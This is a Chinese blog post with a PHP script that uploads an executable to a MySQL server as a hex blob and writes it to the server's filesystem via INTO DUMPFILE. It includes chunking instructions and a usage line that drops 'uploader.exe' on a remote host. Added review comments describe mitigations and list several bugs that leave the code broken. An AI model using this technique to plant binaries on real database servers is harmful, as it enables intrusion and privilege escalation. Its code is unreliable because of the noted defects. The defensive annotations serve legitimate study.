
Mysql uploader File

April 14, 2016 • Security

首先将EXE,也就是执行体,通过C32ASM,转换成16进制,然后通过MYSQL直接创建表,最后将16进制写入到表里,最后在into outfile即可。

(注意,MYSQL有限制,每次只能一次传文件不能大于63KB,所以如果大于63KB的文件,需要将文件分成多块的16进制,依次写入到一个新的EXE,最后在直接copy /b 1.exe+2.exe+3.exe c:Yes.exe即可)

<?php
// Pushes a hex-encoded payload into a throwaway table on the MySQL server and
// dumps it back out as a file on the *server's* filesystem (SELECT ... INTO DUMPFILE).
//
// NOTE(review): this is written against the legacy mysql_* extension, which was
// removed in PHP 7, so the function does not run on a current PHP build as-is.
// NOTE(review, defensive): in MySQL the INTO DUMPFILE step is gated by the FILE
// privilege and by secure_file_priv, and the written file carries the mysqld OS
// user's permissions — restricting both is the mitigation. The fixed
// DROP/CREATE/INSERT/SELECT ... INTO DUMPFILE sequence on a table named Temp_udf
// is a simple pattern to alert on in the general/audit log.
//
// $hostname / $username / $password / $dbname : connection parameters
// $shellcoder    : "0x..." hex literal built by the caller (see the script body below)
// $writefilename : server-side path handed to INTO DUMPFILE
// Returns nothing; every outcome is reported with echo only.
function Upload_file($hostname,$username,$password,$dbname,$shellcoder,$writefilename)
{
    if ($link = mysql_connect($host,$user,$password))
    {
        echo "databases suscess\r\n";
    }else
    {
        die(mysql_error());
    }

    $conn=mysql_select_db($dbname,$link);
    // Exits when the DROP fails — presumably on a server where Temp_udf does not
    // exist yet, since the table is only created a few lines further down.
    if(!mysql_query('DROP TABLE Temp_udf'))
    {
        echo "[-]:drop tables not exists\r\n";
        exit();
    }

    $query=mysql_query('CREATE TABLE Temp_udf(udf BLOB);');
     
    if(!$query)
    {
        echo 'create tables Temp_udf error'.mysql_error();
    }else
    {
        // $shellcoder is interpolated unquoted, so MySQL parses it as a hex literal.
        $query="INSERT into Temp_udf values (CONVERT($shellcoder,CHAR));";
        if(!mysql_query($query))
        {
            echo '[-]:udf insert context error'.mysql_error();
        }else
        {
            // Server-side write: the file is created by mysqld, not by this script.
            $query="SELECT udf FROM Temp_udf INTO DUMPFILE '$writefilename'";
            if(!mysql_query($query))
            {
                echo 'udf dump context'.mysql_error();
            }else
            {
                // Cleanup. NOTE(review): the message below is printed unconditionally
                // (after success too), and it is single-quoted, so \r\n is emitted literally.
                mysql_query('DROP TABLE Temp_udf');
                echo '[-]:Drop table Temp_udf error\r\n';
            }  
        }
    }
}
// ---- CLI driver -------------------------------------------------------------
// Usage (per the help text below):
//   <script> <local file> <host> <user> <password> <db> <remote path>
// The '@' operators silence the undefined-offset notice when arguments are missing.
$filename = @$argv[1];
$hostname = @$argv[2];
$username = @$argv[3];
$password = @$argv[4];
$dbname = @$argv[5];
$remotewritefile = @$argv[6];
// NOTE(review): six arguments plus $argv[0] give $argc == 7, so this guard still
// accepts a call that omits the last argument.
if ($argc < 6)
{
    echo "[-]:$argv[0] pass.exe 192.168.1.1 root 123456 test c:\\uploader.exe\r\n";
    echo "[-]:$argv[0] pass.exe remote_Host mysql_user mysql_password mysql_db uploader_Path\r\n";
    exit();
}
if(!file_exists($filename))
{
    echo "[-]:Error->$filename not exists";
    exit();
}

// NOTE(review): fopen() returns false, not NULL, on failure; the loose == NULL
// comparison still catches it, but fclose() is then called on that false value.
$fp = fopen($filename, "rb");
if ($fp == NULL)
{
    echo "Filename.$filename reader error.\r\n";
    fclose($fp);
    exit();
}

// Side output: the hex string is also written to shellcode.txt in the working
// directory. "a+" appends, so repeated runs accumulate in that file.
$fwritecode = fopen("shellcode.txt","a+");
if($fwritecode == NULL)
{
    echo "Fwrite shellcode error.\r\n";
    fclose($fwritecode);
    exit();
}

// Hard 60000-byte cap on the input; the post above attributes this to a
// per-transfer limit on the MySQL side (not verified here).
$filesz = filesize($filename);
if($filesz > 60000)
{
    echo "Filename:$filename size errors.\r\n";
    echo "Filename: $filename Cannot be greater than 60KB.\r\n";
    exit(1);
}

echo "Filename $filename readers context sucessfuly\r\n";
 
// Reads the file and accumulates a hex string in $hex.
// NOTE(review): fgets() is given strlen($fp) — the length of the resource's string
// form, not of the file — as its line-length limit, and $hex is appended to before
// it is ever initialised; both produce notices/warnings (a TypeError on PHP 8).
while(!feof($fp))
{
    $str = fgets($fp,strlen($fp));
    for($i=0;$i<=strlen($str);$i++)
    {
        $asc = ord(substr($str,$i,1));
        $hex .= dechex($asc);
    }
}

// "0x" prefix so the value is a hex literal inside the INSERT built by Upload_file().
$shellcode = "0x".$hex;

fwrite($fwritecode,$shellcode);
fclose($fp);
fclose($fwritecode);
Upload_file($hostname,$username,$password,$dbname,$shellcode,$remotewritefile);

?>

711784-20160414221459457-811157666.png

test.zip

参考:

http://www.cnblogs.com/killbit/p/5393301.html
